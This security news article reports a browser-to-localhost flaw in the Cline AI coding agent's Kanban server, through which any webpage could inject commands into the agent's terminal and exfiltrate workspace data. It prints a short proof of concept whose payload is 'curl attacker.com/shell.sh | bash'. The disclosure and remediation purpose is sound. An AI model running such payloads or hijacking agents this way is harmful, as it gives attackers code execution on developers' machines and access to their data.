Cline AI Agent Flaw Let Any Website Execute Code on Developer Machines

A critical vulnerability in Cline's Kanban server allowed any website to hijack the AI coding agent's terminal, execute arbitrary commands, and exfiltrate sensitive workspace data. The flaw—CVE-2026-44211—received a CVSS score of 9.7 and required no phishing, malware installation, or social engineering. A developer simply had to visit a malicious webpage while the Kanban server was running.

Oasis Security disclosed the vulnerability responsibly, and Cline patched the issue in version 0.1.66. But the attack surface it exposed—localhost services accessible to browser-based attacks—affects far more than just Cline.

TL;DR

• What happened: Cline's Kanban WebSocket server accepted connections from any origin without authentication
• Who's affected: Developers running Cline versions prior to 0.1.66
• Severity: Critical (CVSS 9.7) - enables RCE via the AI agent
• Action required: Update to Cline v0.1.66 or later immediately

What is Cline?

Cline is an AI-powered coding agent that runs as a VS Code extension. It integrates with Claude, GPT-4, and other language models to help developers write, debug, and refactor code. The Kanban feature provides a task management interface that coordinates work across the AI agent's various capabilities.

The extension has grown rapidly popular among developers seeking AI-assisted coding workflows. Its integration depth—reading files, executing commands, managing git operations—makes it powerful but also creates significant security surface if compromised.

How the Attack Worked

According to Oasis Security's analysis, the kanban npm package bundled with Cline starts a WebSocket server on 127.0.0.1:3484. The server had three critical flaws:

1. No origin validation - Any website could connect, not just Cline's UI
2. No authentication tokens - Connections weren't verified as legitimate
3. No client verification - No mechanism to confirm the Kanban UI was the actual client

WebSocket connections are exempt from same-origin policy restrictions that protect most browser-based attacks. Any webpage a developer visits can silently establish WebSocket connections to localhost services.

Attack Capabilities

Once connected, an attacker could:

Exfiltrate sensitive data in real-time:

• Workspace filesystem paths
• Task titles and descriptions
• Git branch information
• AI agent chat messages and context

Execute arbitrary code: The attacker injects a malicious prompt into the agent's terminal channel, then simulates a keypress. The AI agent accepts this as a legitimate instruction and executes whatever shell command the attacker specified.

Disrupt development: Control channels allow terminating active agent tasks, effectively DoS-ing the development workflow.

Proof of Concept

The attack required only a few lines of JavaScript on any webpage:

// Attacker's webpage
const ws = new WebSocket('ws://127.0.0.1:3484');

ws.onopen = () => {
  // Inject malicious command via agent terminal
  ws.send(JSON.stringify({
    type: 'terminal_input',
    data: 'curl attacker.com/shell.sh | bash'
  }));
};

The developer sees nothing suspicious. They're browsing a seemingly innocent website—perhaps a documentation page, a Stack Overflow answer, or a tech blog. Behind the scenes, the page connects to their local Kanban server and issues commands through their AI agent.

Why This Matters

This vulnerability highlights a growing attack surface: AI coding assistants with deep system access. As developers increasingly rely on tools like Cline, Cursor, Copilot, and others, the blast radius of a single flaw expands dramatically.

Traditional code vulnerabilities might expose one application. A compromised AI agent can access everything the developer can—source code, credentials, deployment pipelines, production infrastructure.

The browser-to-localhost attack vector is also underappreciated. Many developer tools run local services: debuggers, preview servers, API proxies, container management. Few implement proper origin validation. We've seen similar patterns in other vulnerability disclosures this year.

Remediation

1. Update immediately to Cline version 0.1.66 or later

2. Audit other localhost services across your development tools for similar origin validation gaps

3. Implement host-based firewall rules restricting network port bindings where possible

4. Review endpoint security policies for process-level controls on network listeners

Affected Versions

Status	Versions
Vulnerable	Prior to 0.1.66
Patched	0.1.66 and later

Frequently Asked Questions

Was this vulnerability exploited in the wild? Oasis Security has not reported evidence of active exploitation. The vulnerability was discovered during a security assessment and responsibly disclosed before public proof-of-concept code became available.

Does this affect other AI coding tools? CVE-2026-44211 is specific to Cline's Kanban server implementation. However, the underlying pattern—localhost services without origin validation—may exist in other tools. The research should prompt security reviews across the AI development tool ecosystem.

I don't use the Kanban feature. Am I still affected? If the kanban package is installed as part of Cline, the vulnerable server may start regardless of whether you actively use the Kanban UI. Update to the patched version to eliminate the risk.